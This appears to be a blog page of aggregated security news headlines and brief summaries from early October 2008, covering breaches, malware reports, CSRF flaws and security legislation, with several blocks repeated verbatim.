Hijacking Satellite Navigation
By Erica NaoneThursday, October 02, 2008
Sending false signals to GPS receivers could disrupt critical infrastructure.
Report: Adware supplies one third of all malwareCNET - Thu Oct 2, 7:57 PM ET
On Thursday, Panda Security released its report for the third quarter stating that adware is responsible for one third of all new malicious software. In particular, the security company cited increased use of fake antivirus scanners.
Lawyers want Windows Update used to push 'Vista Capable' lawsuit notices
Vendors rush to fix bug that could crash Internet systems
Researcher finds evidence of massive site compromise
Digs up cache of 200,000 site credentials for Fortune 500 firms, weapons makers, governments
CSRF Flaws Found on Major Websites - 9/29/2008 5:35:00 PM Princeton University researchers reveal four sites with cross-site request forgery flaws and unveil tools to protect against these attacks
California makes it a crime to 'skim' RFID tags
Sysadmin admits stealing computers, office equipment from Navy
California outlaws RFID card skimming
Chinese Skype spies on users, researcher says
Frustrated researcher details iPhone security bugs
Many computer users lack basic security precautions, survey says
How to Root Out Bots in Your Network - 10/2/2008 5:40:00 PM
Expert gives tips on how to detect and remediate internal botnet infestations
Why Risk Management Doesn't Work - 10/2/2008 3:45:00 PM
Two new studies challenge current wisdom about calculating an enterprise's security risk -- and recommend rethinking the process
House.gov Still Plagued by E-mail Deluge
A glut of e-mail from constituents and special interest groups continued to pose problems for the Web sites for members of the U.S. House of Representatives on Thursday, as millions of Americans attempt to voice their opinions on the financial bailout package the day before an expected vote on the measure.
Second bill tackles laptop border searchesNews Brief, 2008-10-02
Three U.S. lawmakers propose a law to limit the searches of laptops or other electronic devices to cases where customs agents have reasonable suspicion of illegal activity.
Credit card processors finally get clue, will ban WEP
Credit card processors have finally realized what security experts have known since 2001: WEP is next to worthless as a wireless security protocol, and they're finally going its use in credit card processing systems—but not until mid-2010. The use of WEP was a major factor in the largest consumer data theft ever.
October 03, 2008 - 11:45AM CT - by Jacqui Cheng
Livefilestore URLs used in spamOctober 1, 2008
Spammers are using files hosted on livefilestore.com to redirect users to suspect web pages.
Judge Won't Allow Researchers To Reveal Report On E-Voting Machines
Artemis Backstage #1: Malware Mapping
News about the Artemis project has been out for a little while. As the rollout continues we want to post some of juicy backstage gossip here, making you some of the first people to see this outside of the core project team!
If you’ve not heard about the Artemis technology yet, it’s our “in-the-cloud”-based malware detection; head over to the McAfee Artemis micro-site. I highly recommend the podcast (hidden on the right-hand side) as my colleague Dimitry Gryaznov outtalks our communications guru Dave Marcus.
One of the things Artemis provides to researchers is very clear telemetry on active malware campaigns, and I want to share a few interesting examples. All the “measles maps” below show a one-day period and were all taken at the same time earlier today.
Cybergang moles steal company data
Dan Raywood October 02, 2008
Criminal gangs have been placing staff members in companies to operate as moles, an internet security expert said.
Wireless at Fiber Speeds
By Kate GreeneFriday, October 03, 2008
New millimeter-wave technology sends data at 10 gigabits per second.
Hijacking Satellite Navigation
By Erica NaoneThursday, October 02, 2008
Sending false signals to GPS receivers could disrupt critical infrastructure.
Report: Adware supplies one third of all malwareCNET - Thu Oct 2, 7:57 PM ET
On Thursday, Panda Security released its report for the third quarter stating that adware is responsible for one third of all new malicious software. In particular, the security company cited increased use of fake antivirus scanners.
Wednesday, October 1, 2008
Security News Feed Wednesday 10/1/08
September 30, Washington Business Journal – (National)
Webroot identifies presidential campaign malware.
Webroot, a U.S.-based IT security vendor, says it has spotted the widespread deployment of malware hidden inside campaign videos for the presidential candidates of both major political parties. The problem stems, the firm says, from widespread usage of the Gnutella file-sharing network to disseminate hi-resolution campaign videos by the two candidates. According to Webroot, a quick search of the FrostWire network - which uses the Gnutella network format, apparently - indicated that of the 34 search results for "Obama Speech" 14 contained active malware while five of the 19 results for "McCain Speech" were found to be harboring malware. Source: http://security.itproportal.com/articles/2008/09/30/webroot-identifies-presidential-campaign-malware/
Transpacific undersea cable completed.
A crucial undersea fiber-optic cable that will provide more Internet capacity between the U.S. and China was completed Monday, according to news reports. Six of the world’s largest phone companies have finished building an 18,000-kilometer "Trans-Pacific Express" cable that will link the U.S., China, South Korea, and Taiwan, according to the Dow Jones news service. The high-speed link will provide more capacity for the region, which is currently served by a single low-capacity cable that provides connectivity between mainland China and the U.S. Most web traffic between the U.S. and China goes through Hong Kong or Japan. These routes can often cause transmission delays. The project, which cost about $500 million, was prompted when an earthquake off Taiwan’s coast in December 2006 severed several undersea data cables, which resulted in disrupted communications throughout much of Asia. The world’s largest phone companies decided that something had to be done to provide more infrastructure to the region.
Source: http://news.cnet.com/8301-1001_3-10053949-92.html
Kevin Mitnick detained, released after Colombia trip
Famed social engineer-cum-hacker tells a cautionary tale about the dangers of traveling into the U.S. with a laptop, and sending packages back home from Bogota.
Wed, Oct 01 04:00:00 PDT 2008 Read full story
Apple selling unlocked iPhone 3G in Hong Kong
T-Mobile stops taking Android phone orders
IBM releasing iNotes for iPhone
Study: Routine Misbehavior by End Users Can Lead to Major Data Leaks
Many end users don't understand the risks associated with breaking company security policies, report says
Attackers Mix Online, Offline Exploits to Mask Financial Fraud
Cybercriminals split the attack cycle into pieces that may appear unrelated in order to evade detection
New DOS Attack Is a Killer
With a newly discovered denial-of-service attack against broadband Internet connections, machines don't come back
A Simple Sync Can 'Sink' Your PC
Researchers release proof-of-concept for attack on Windows' ActiveSync 4.0
Wall Street meltdown expected to drive risk management investments http://cwflyris.computerworld.com/t/3693514/6339517/142045/2/
Health hazards for IT workers -- how that desk job wears your body down http://cwflyris.computerworld.com/t/3693514/6339517/142043/2/
Identity theft victim wins right to sue county clerk over posting of personal data http://cwflyris.computerworld.com/t/3691317/6339517/142005/2/
Toshiba to ship 256GB solid-state drives in October http://cwflyris.computerworld.com/t/3691317/6339517/142011/2/
Stolen Hard Drives Hold Sensitive Data of 50,000 UK Ministry of Defence Staff (September 26 & 29, 2008)
Personally identifiable information of as many as 50,000 UK military staff has been compromised due to the theft of three portable hard drives from the RAF Innsworth base in Gloucestershire. The unencrypted data include addresses, bank account numbers and medical records. The theft is under investigation by Ministry of Defence (MoD) police and Gloucestershire police. The MoD plans to notify all individuals affected by the data security breach.
http://www.computerworlduk.com/management/government-law/public-sector/news/index.cfm?newsid=11244
http://www.mirror.co.uk/news/top-stories/2008/09/26/safety-fears-for-50-000-raf-staff-after-personal-files-are-stolen-115875-20754809/
http://www.theregister.co.uk/2008/09/29/raf_usb_drives_stolen/
[Editor's Note (Honan): The stolen hard drives were apparently not encrypted as they were located in a secure facility. I guess the RAF has learnt a lesson in defense in depth and that you need to ensure you include layers of defense in the physical, logical and personnel domains.]
Los Alamos Needs to Implement Stronger Security, Says GAO (September 25, 26 & 29, 2008) According to a report from the US Government Accountability Office (GAO), cyber security vulnerabilities at the Los Alamos National Laboratory (LANL) could expose sensitive data. Although LANL has begun implementing previously recommended measures to improve data security, there are still holes in its unclassified network, which holds information about export control and sensitive employee data. The network itself has strong authentication measures in place, but once access is granted, users can find their way around the other security measures to access the sensitive data. The report also found weaknesses in physical security at LANL. The GAO made several recommendations for improving LANL's cyber security posture, including "requir[ing] the Director of LANL to ... ensure that the risk assessment for the unclassified network evaluates all known vulnerabilities and is revised periodically and strengthen policies with a view toward ... reducing ...
foreign nationals' access to the unclassified network."
http://www.theregister.co.uk/2008/09/29/los_alamos_cyber_insecurity/
http://www.fcw.com/online/news/153921-1.html
http://www.nextgov.com/nextgov/ng_20080929_5288.php
http://www.gao.gov/new.items/d081180t.pdf
Secondhand VPN Router Connects to Previous Owners' Network
http://news.bbc.co.uk/2/hi/technology/7635622.stm
... Overall, pay for security certifications was up 0.4% during the last six months and 2% during the last year (through July 1, 2008), compared with the downward trend of all IT certifications, which lost 2.5% during the last six months and 3.5% during the past year.
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1331613,00.html
NEW DATA BREACH COMPLIANCE RULES FOR RETAILERS IN CALIFORNIA
An amended version of the Consumer Data Protection Act, or AB 1656, is sure to be signed by Governor Schwarzenegger after the California State Assembly approved it by a 74-1 margin.
...
For an inside look at the new rules, visit AB 1656. As more stringent legislation is enacted, businesses need to be prepared and know where their data risks reside.
CSRF Flaws Found on Major Websites
Princeton University researchers reveal four sites with cross-site request forgery flaws and unveil tools to protect against these attacks
The data center from hell, Part 1 Seen any good horror movies lately? Here's the script for a security geek's version of the classic slasher flick.
The data center from hell, Part 2 Buitron: One circuit breaker was in a garage bay where company trucks parked. Anyone from the street could walk in at any time and throw the switch on the breaker box, cutting off power instantly to all of the company's servers.
Google sets up government sales shop to preach gospel of cloud computing to federal agencies
Adobe vulnerability exploits are mounting
Chuck Miller September 26, 2008
A new and previously unknown exploit toolkit exclusively targets Adobe's PDF format, and large numbers of PDF attacks continue.
Webroot identifies presidential campaign malware.
Webroot, a U.S.-based IT security vendor, says it has spotted the widespread deployment of malware hidden inside campaign videos for the presidential candidates of both major political parties. The problem stems, the firm says, from widespread usage of the Gnutella file-sharing network to disseminate hi-resolution campaign videos by the two candidates. According to Webroot, a quick search of the FrostWire network - which uses the Gnutella network format, apparently - indicated that of the 34 search results for "Obama Speech" 14 contained active malware while five of the 19 results for "McCain Speech" were found to be harboring malware. Source: http://security.itproportal.com/articles/2008/09/30/webroot-identifies-presidential-campaign-malware/
Transpacific undersea cable completed.
A crucial undersea fiber-optic cable that will provide more Internet capacity between the U.S. and China was completed Monday, according to news reports. Six of the world’s largest phone companies have finished building an 18,000-kilometer "Trans-Pacific Express" cable that will link the U.S., China, South Korea, and Taiwan, according to the Dow Jones news service. The high-speed link will provide more capacity for the region, which is currently served by a single low-capacity cable that provides connectivity between mainland China and the U.S. Most web traffic between the U.S. and China goes through Hong Kong or Japan. These routes can often cause transmission delays. The project, which cost about $500 million, was prompted when an earthquake off Taiwan’s coast in December 2006 severed several undersea data cables, which resulted in disrupted communications throughout much of Asia. The world’s largest phone companies decided that something had to be done to provide more infrastructure to the region.
Source: http://news.cnet.com/8301-1001_3-10053949-92.html
Kevin Mitnick detained, released after Colombia trip
Famed social engineer-cum-hacker tells a cautionary tale about the dangers of traveling into the U.S. with a laptop, and sending packages back home from Bogota.
Wed, Oct 01 04:00:00 PDT 2008 Read full story
Apple selling unlocked iPhone 3G in Hong Kong
T-Mobile stops taking Android phone orders
IBM releasing iNotes for iPhone
Study: Routine Misbehavior by End Users Can Lead to Major Data Leaks
Many end users don't understand the risks associated with breaking company security policies, report says
Attackers Mix Online, Offline Exploits to Mask Financial Fraud
Cybercriminals split the attack cycle into pieces that may appear unrelated in order to evade detection
New DOS Attack Is a Killer
With a newly discovered denial-of-service attack against broadband Internet connections, machines don't come back
A Simple Sync Can 'Sink' Your PC
Researchers release proof-of-concept for attack on Windows' ActiveSync 4.0
Wall Street meltdown expected to drive risk management investments http://cwflyris.computerworld.com/t/3693514/6339517/142045/2/
Health hazards for IT workers -- how that desk job wears your body down http://cwflyris.computerworld.com/t/3693514/6339517/142043/2/
Microsoft: Bad things happen to firms that use unlicensed Windows http://cwflyris.computerworld.com/t/3691317/6339517/142001/2/
Identity theft victim wins right to sue county clerk over posting of personal data http://cwflyris.computerworld.com/t/3691317/6339517/142005/2/
Toshiba to ship 256GB solid-state drives in October http://cwflyris.computerworld.com/t/3691317/6339517/142011/2/
Stolen Hard Drives Hold Sensitive Data of 50,000 UK Ministry of Defence Staff (September 26 & 29, 2008)
Personally identifiable information of as many as 50,000 UK military staff has been compromised due to the theft of three portable hard drives from the RAF Innsworth base in Gloucestershire. The unencrypted data include addresses, bank account numbers and medical records. The theft is under investigation by Ministry of Defence (MoD) police and Gloucestershire police. The MoD plans to notify all individuals affected by the data security breach.
http://www.computerworlduk.com/management/government-law/public-sector/news/index.cfm?newsid=11244
http://www.mirror.co.uk/news/top-stories/2008/09/26/safety-fears-for-50-000-raf-staff-after-personal-files-are-stolen-115875-20754809/
http://www.theregister.co.uk/2008/09/29/raf_usb_drives_stolen/
[Editor's Note (Honan): The stolen hard drives were apparently not encrypted as they were located in a secure facility. I guess the RAF has learnt a lesson in defense in depth and that you need to ensure you include layers of defense in the physical, logical and personnel domains.]
Los Alamos Needs to Implement Stronger Security, Says GAO (September 25, 26 & 29, 2008) According to a report from the US Government Accountability Office (GAO), cyber security vulnerabilities at the Los Alamos National Laboratory (LANL) could expose sensitive data. Although LANL has begun implementing previously recommended measures to improve data security, there are still holes in its unclassified network, which holds information about export control and sensitive employee data. The network itself has strong authentication measures in place, but once access is granted, users can find their way around the other security measures to access the sensitive data. The report also found weaknesses in physical security at LANL. The GAO made several recommendations for improving LANL's cyber security posture, including "requir[ing] the Director of LANL to ... ensure that the risk assessment for the unclassified network evaluates all known vulnerabilities and is revised periodically and strengthen policies with a view toward ... reducing ...
foreign nationals' access to the unclassified network."
http://www.theregister.co.uk/2008/09/29/los_alamos_cyber_insecurity/
http://www.fcw.com/online/news/153921-1.html
http://www.nextgov.com/nextgov/ng_20080929_5288.php
http://www.gao.gov/new.items/d081180t.pdf
Secondhand VPN Router Connects to Previous Owners' Network
http://news.bbc.co.uk/2/hi/technology/7635622.stm
... Overall, pay for security certifications was up 0.4% during the last six months and 2% during the last year (through July 1, 2008), compared with the downward trend of all IT certifications, which lost 2.5% during the last six months and 3.5% during the past year.
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1331613,00.html
NEW DATA BREACH COMPLIANCE RULES FOR RETAILERS IN CALIFORNIA
An amended version of the Consumer Data Protection Act, or AB 1656, is sure to be signed by Governor Schwarzenegger after the California State Assembly approved it by a 74-1 margin.
...
For an inside look at the new rules, visit AB 1656. As more stringent legislation is enacted, businesses need to be prepared and know where their data risks reside.
CSRF Flaws Found on Major Websites
Princeton University researchers reveal four sites with cross-site request forgery flaws and unveil tools to protect against these attacks
The data center from hell, Part 1 Seen any good horror movies lately? Here's the script for a security geek's version of the classic slasher flick.
The data center from hell, Part 2 Buitron: One circuit breaker was in a garage bay where company trucks parked. Anyone from the street could walk in at any time and throw the switch on the breaker box, cutting off power instantly to all of the company's servers.
Google sets up government sales shop to preach gospel of cloud computing to federal agencies
Adobe vulnerability exploits are mounting
Chuck Miller September 26, 2008
A new and previously unknown exploit toolkit exclusively targets Adobe's PDF format, and large numbers of PDF attacks continue.
Subscribe to:
Posts (Atom)
